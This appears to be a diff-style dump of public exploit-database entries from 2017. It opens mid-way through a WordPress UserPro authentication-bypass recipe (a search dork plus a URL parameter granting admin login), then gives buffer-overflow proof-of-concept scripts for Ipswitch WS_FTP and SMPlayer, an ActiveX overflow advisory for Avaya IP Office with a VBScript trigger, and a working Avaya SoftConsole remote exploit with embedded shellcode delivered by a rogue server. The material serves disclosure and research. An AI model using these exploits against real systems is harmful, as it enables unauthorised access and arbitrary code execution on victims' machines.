================================================================================
1 - Google Dork inurl:/plugins/userpro
2 - Browse to a site that has the userpro plugin installed.
3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true
4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in
will full administrator access.
================================================================================
10/25/2017 Wordfence notified of issue by Iain Hadgraft.
10/26/2017 Vendor resolved the issue in the plugin.
11/04/2017 - Disclosure.

21
platforms/windows/dos/43115.py Executable file
View file

@ -0,0 +1,21 @@
#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH)
#Author: Kevin McGuigan. Twitter: @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#Date: 03/11/2017
#Version: 12.6.03
#CVE: CVE-2017-16513
#Tested on: Windows 7 32-bit
#Use script to generate payload. Paste payload into search field, replace Ds with shellcode.
#nSEH = "\x74\x08\x90\x90"
#SEH = "\x31\x2D\x91\x23"
buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4
f = open ("poc.txt", "w")
f.write(buffer + nSEH + SEH + "D" * 200)
f.close()

156
platforms/windows/dos/43120.txt Executable file
View file

@ -0,0 +1,156 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: ApparitionSec
Vendor:
=============
www.avaya.com
Product:
===========
Avaya IP Office (IPO)
v9.1.0 - 10.1
IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions.
For businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.
Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN and WAN (LAN2).
In addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application).
Available editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud.
Vulnerability Type:
====================
ActiveX Remote Buffer Overflow
CVE Reference:
==============
CVE-2017-12969
ASA-2017-313
Security Issue:
================
ViewerCtrl.ocx ActiveX Component used by Avaya IP Office (IPO) can be exploited by remote attackers to potentially execute arbitrary
attacker supplied code. User would have to visit a malicious webpage using InternetExplorer where the exploit could be triggered.
Clsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334}
Safe for Script: False
Safe for Init: False
ACCESS_VIOLATION
8C4A77 MOV EAX,[ECX]
SEH Chain:
-----------
1 8D00A3 po.dll
2 36A7E95 CIPElements.dll
3 36A8115 CIPElements.dll
4 788719 ViewerCtrl.OCX
5 788533 ViewerCtrl.OCX
6 78862A ViewerCtrl.OCX
7 6008793E mfc90u.dll
8 60089B31 mfc90u.dll
9 779858C5 ntdll.dll
(d360.1040c): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for po.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CIPElements.dll -
eax=0608ec18 ebx=00000000 ecx=00000000 edx=00000000 esi=0aa7bdd0 edi=0aa7bdd0
eip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
po!cip::po::SpecialObjects::getPresetObject+0x77:
06064a77 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=????????
0:008> !load winext/msec
0:008> !exploitable
!exploitable 1.6.0.0
*** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for user32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ieframe.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for iertutil.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for IEShims.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at
po!cip::po::SpecialObjects::getPresetObject+0x0000000000000077 (Hash=0x6f1f914b.0xc46b7285)
The data from the faulting address is later used as the target for a branch.
References:
==============
https://downloads.avaya.com/css/P8/documents/101044091
Exploit/POC:
=============
<object classid='clsid:27F12EFD-325D-4907-A2D2-C38A2B6D3334' id='victim' />
<script language='vbscript'>
victimFile = "C:\Program Files (x86)\Avaya\IP Office Contact Center\User Interface\ViewerCtrl.ocx"
prototype = "Function open ( ByVal containerId As String ) As Long"
memberName = "open"
progid = "ViewerCtrlLib.ViewerCtrl"
argCount = 1
payload=String(5142, "A")
victim.open payload
</script>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: July 12, 2017
Vendor acknowlegement: July 14, 2017
CVE assigned by mitre : August 19, 2017
Vendor advisory : November 4, 2017
November 5, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

27
platforms/windows/dos/43124.py Executable file
View file

@ -0,0 +1,27 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: SMPlayer 17.11.0 - '.m3u' Crash (PoC)
# Date: 05-11-2017
# Vulnerable Software: SMPlayer v17.11.0
# Vendor Homepage: http://www.smplayer.info
# Version: v17.11.0
# Software Link: http://www.smplayer.info/en/downloads
# Tested On: Windows 7 x64
#
#
# PoC: generate crash.m3u, open playlist twice in app
#
#
file="crash.m3u"
crash = "A"*24538 #crashes on 24538, but more will do
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()

172
platforms/windows/remote/43121.txt Executable file
View file

@ -0,0 +1,172 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: apparitionSec
Vendor:
=============
www.avaya.com
Product:
===========
Avaya IP Office (IPO)
v9.1.0 - 10.1
IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions.
For businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.
Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN and WAN (LAN2).
In addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application).
Available editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud.
Vulnerability Type:
===================
Remote Buffer Overflow
CVE Reference:
==============
CVE-2017-11309
ASA-2017-307
Security Issue:
================
SoftConsole.exe does not check bounds when reading server response on making an outbound connection, resulting in a classic
Buffer Overflow exploit.
Avaya IP Office user must connect to a malicious server where a remote attacker can then deliver the buffer overflow
payload in the server response, exploiting the SoftConsole client. This vulnerability allows attackers to deliver and
execute arbitrary attacker supplied code on the Avaya host system.
References:
===========
https://downloads.avaya.com/css/P8/documents/101044086
POC Video URL:
==============
https://vimeo.com/224679849
Exploit/POC:
=============
import struct,socket
#Log data, item 8
# Address=50E083A1
# Message= 0x50e083a1 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READ} [IndyCore190.bpl]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v19.0.14356.6604
#(C:\Program Files (x86)\Avaya\IP Office\SoftConsole\IndyCore190.bpl)
#50E083A1 #POP ECX POP EBP RET
'''
No SafeSEH
'''
HOST="127.0.0.1"
PORT=80
#shellcode to call wusa.exe Windows Update Standalone Installer (Tested Win 7)
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08"
"\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x8B\x7B"
"\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99\x32\x17\x66\xC1"
"\xCA\x01\xAE\x75\xF7\x66\x81\xFA\x10\xF5\xE0\xE2\x75\xCF\x8B\x53"
"\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68"
"\x2E\x65\x78\x65\x68\x77\x75\x73\x61\x54\x87\x04\x24\x50\xFF\xD5"
"\xCC")
'''
calculated by taking the negative of the number and convert to hex:
in gdb
1
2
p/x -1116
$4 = 0xfffffba4
So now we know that our near jump is going to be \xe9\xa4\xfb\xff\xff.
'''
seh=struct.pack("<L", 0x50E149FD) #POP ECX POP EBP RET
#payload="A"*564+"BBBBRRRR"+"A"*232 #control SEH here
#(gdb) p/x -112
#$1 = 0xffffff90
negjmp="\xeb\x90\xff\xff"
payload="A"*452+"\x90"*10+sc+"A"*5+negjmp+seh+"\x90"*226
s = socket.socket()
host = ''
s.bind((HOST, PORT))
s.listen(5)
print 'Avaya IP Office SoftConsole 9.1.0'
print '0day Remote Buffer Overflow Exploit'
print 'Discovery / exploit: hyp3rlinx\n'
print 'Listening on port 80 for Avaya client connectionz...'
while True:
conn, addr = s.accept()
conn.send(payload+'\r\n')
print 'KABOOM!!!'
conn.close()
s.close()
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: July 7, 2017
Vendor reply "under investigation" : July 7, 2017
Vendor acknowledgement of issue : July 12, 2017
CVE assigned by mitre: July 13, 2017
Vendor advisory: November 4, 2017
November 5, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx